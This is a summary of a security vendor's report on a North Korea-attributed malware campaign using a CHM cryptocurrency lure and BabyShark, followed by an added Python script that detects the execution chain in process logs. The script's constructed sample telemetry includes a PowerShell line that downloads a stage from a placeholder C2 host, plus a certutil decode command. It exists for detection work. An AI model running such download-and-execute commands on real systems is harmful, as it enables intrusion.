Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
2025-06-17 • S2W •
S2W attributes a May 2025 cryptocurrency-themed malware campaign to the North Korea-backed Kimsuky group. The lure is a malicious Windows compiled HTML Help (CHM) file named wallet.chm. Once the CHM is opened and its embedded content is triggered, the chain runs through JavaScript, shortcut creation via the HTML Help ActiveX control, certutil decoding, wscript.exe execution, and PowerShell downloads from C2 infrastructure hosted on the compromised server of a domestic electronics manufacturing and repair company. The downloaded payload is a BabyShark variant that collects host details, directory and file listings, and process and antivirus information, and can retrieve additional payloads. A separate PowerShell monitoring script captures clipboard contents and keystrokes, uses the mutex Global\AlreadyRunning19122345 to prevent duplicate instances, and periodically exfiltrates the collected data to the C2 server. The activity shows Kimsuky continuing to reuse familiar CHM and BabyShark tradecraft while shifting to cryptocurrency lures and new delivery infrastructure.
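The execution chain above (CHM viewer spawning certutil and wscript.exe, wscript.exe spawning a downloading PowerShell) is what a detection engineer would hunt for in process-creation telemetry. The script below is an added example, not code from S2W or from the campaign: it parses constructed Sysmon-style process records, applies one rule per hop of the chain, treats the reported mutex name as a direct indicator in PowerShell script-block text, and escalates only when several hops fire together. It assumes hh.exe (the Windows HTML Help viewer) is the parent of whatever the CHM launches; the file paths, hostnames and script-block text in the sample are invented for illustration, and only the mutex name comes from the report.

```python
"""Detection sketch for the wallet.chm execution chain described above.

Added example, not S2W's code or the Kimsuky script. It assumes
Sysmon-style process-creation records (ParentImage, Image, CommandLine)
and PowerShell script-block text; every log line below is constructed.
The only indicator taken from the report is the mutex name.
"""
import re
from dataclasses import dataclass

# Mutex the report attributes to the PowerShell clipboard/keystroke monitor.
MUTEX_NAME = r"Global\AlreadyRunning19122345"

# Assumption: hh.exe (the Windows HTML Help viewer) is the process that
# opens a CHM, so anything it spawns from this set is worth flagging.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe",
                "powershell.exe", "certutil.exe", "mshta.exe"}
DECODE_RE = re.compile(r"(^|\s)-(decode|decodehex)\b", re.I)
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # lowercase basename of ParentImage
    image: str     # lowercase basename of Image
    cmdline: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one 'Key=Value|Key=Value' record (constructed format, no '|' in values)."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(_basename(fields["ParentImage"]),
                     _basename(fields["Image"]), fields["CommandLine"])


# One rule per hop: CHM viewer -> certutil decode -> wscript -> PowerShell download.
RULES = {
    "chm_spawns_script_host":
        lambda e: e.parent == "hh.exe" and e.image in SCRIPT_HOSTS,
    "certutil_decode":
        lambda e: e.image == "certutil.exe" and bool(DECODE_RE.search(e.cmdline)),
    "wscript_spawns_powershell":
        lambda e: e.parent in {"wscript.exe", "cscript.exe"} and e.image == "powershell.exe",
    "powershell_download":
        lambda e: e.image == "powershell.exe" and bool(DOWNLOAD_RE.search(e.cmdline)),
}


def match_rules(events):
    """Map each rule name to the indices of the events that satisfy it."""
    hits = {name: [] for name in RULES}
    for i, ev in enumerate(events):
        for name, pred in RULES.items():
            if pred(ev):
                hits[name].append(i)
    return hits


def scriptblock_has_mutex(text: str) -> bool:
    """Script-block (Event ID 4104) text naming the reported mutex is a direct IOC match."""
    return MUTEX_NAME.lower() in text.lower()


def verdict(hits, scriptblocks=()):
    """Escalate to 'high' only when the CHM hop plus at least two further signals fire."""
    fired = {name for name, idx in hits.items() if idx}
    if any(scriptblock_has_mutex(t) for t in scriptblocks):
        fired.add("known_mutex_in_scriptblock")
    if "chm_spawns_script_host" in fired and len(fired) >= 3:
        return "high", sorted(fired)
    return ("medium" if fired else "none"), sorted(fired)


# Constructed sample telemetry: the chain from the write-up plus one benign launch.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\hh.exe|CommandLine="C:\Windows\hh.exe" C:\Users\u\Downloads\wallet.chm
ParentImage=C:\Windows\hh.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -decode C:\Users\u\AppData\Local\Temp\blob.txt C:\Users\u\AppData\Local\Temp\run.vbs
ParentImage=C:\Windows\hh.exe|Image=C:\Windows\System32\wscript.exe|CommandLine=wscript.exe C:\Users\u\AppData\Local\Temp\run.vbs
ParentImage=C:\Windows\System32\wscript.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -c "(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe
"""

# Constructed script-block text that merely references the reported mutex name.
SAMPLE_SCRIPTBLOCK = r"$m = New-Object System.Threading.Mutex($false, 'Global\AlreadyRunning19122345')"


def analyze(log_text: str, scriptblocks=()):
    """Parse, match and score a batch of records; returns (level, fired, hits)."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    hits = match_rules(events)
    level, fired = verdict(hits, scriptblocks)
    return level, fired, hits


if __name__ == "__main__":
    level, fired, hits = analyze(SAMPLE_LOG, [SAMPLE_SCRIPTBLOCK])
    print(f"verdict={level} fired={fired}")
    for name, idx in hits.items():
        print(f"  {name}: events {idx}")
```

The per-hop rules are deliberately loose on their own (certutil -decode and wscript launching PowerShell both occur in legitimate administration), which is why the verdict requires the CHM-parent hop plus two more signals before escalating; in a real pipeline the record format would be whatever your SIEM emits rather than the pipe-delimited form used here.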